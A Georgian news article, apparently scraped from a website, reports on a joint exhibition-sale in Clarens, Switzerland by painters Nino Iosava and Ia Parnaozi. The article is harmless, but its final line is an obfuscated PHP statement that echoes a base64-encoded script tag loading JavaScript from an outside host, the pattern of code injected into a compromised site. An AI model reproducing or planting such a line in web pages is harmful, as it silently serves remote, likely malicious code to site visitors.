celsiusi
ავერსი საქკაბელი
შვეიცარიის ქალაქ კლარენსში გალერეა L’Eskyna, école et espace d art-ში გამოფენა - გაყიდვა 27 აგვისტოს გაიხსნა და 17 სექტემბრამდე გაგრძელდება.  
გამოფენაზე ქართველი მხატვრების, ნინო იოსავასა და იტალიაში მოღვაწე ია ფარნაოზის 15-15 ნამუშევარია წარმოდგენილი.
როგორც საინფორმაციო სააგენტო BUSINESS TIME- ს ნინო იოსავამ განუცხადა, გამოფენაზე უკვე იყვნენ საპატიო სტუმრები, ადგილობრივი ხელოვანები და ასევე, სხვა ახლომდებარე ქალაქებიდან ჩამოსული ვიზიტორები. 
 
ექსპოზიციაზე წარმოდგენილია მხატვრების მიერ სხვადასხვა დროს შესრულებული ნამუშევრები.  წარმოდგენილი  ოცდაათივე  ნამუშევრი ერთმანეთისგან ჟანრული დიაპაზონის გარდა შესრულების მკვეთრად გამოხატული, ინდივიდუალური მხატვრული მანერით გამოირჩევა.  
 
„ეს არის ჩემი და იას მეორე ერთობლივი გამოფენა, თქვენ იცით, რომ პირველი იყო შარშან მილანში, რომელსაც საკმაოდ დიდი გამოხმაურება და დაინტერესება მოჰყვა არაერთი კუთხით. იქვე დაიბეჭდა ჩვენი კატალოგიც და ეს იდეაც იქვე გაჟღერდა, რომ მორიგი გამოფენა შვეიცარიაში მოგვეწყო.   აქ არის ჩემი 15 სხვადასხვა ჟანრის ფერწერული ტილო  წარმოდგენილი და ასევე, იას 15 ძალიან საინტერესო, ორიგინალური, განსხვავებული ჟანრის ნამუშევრები,“ – განაცხადა ნინო იოსავამ. 
 
ცნობისთვის, გამოფენის დასრულერბის შემდეგ დაიბეჭდება ორივე მხატვრის ნამუშევრების კატალოგი. 
 
870
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");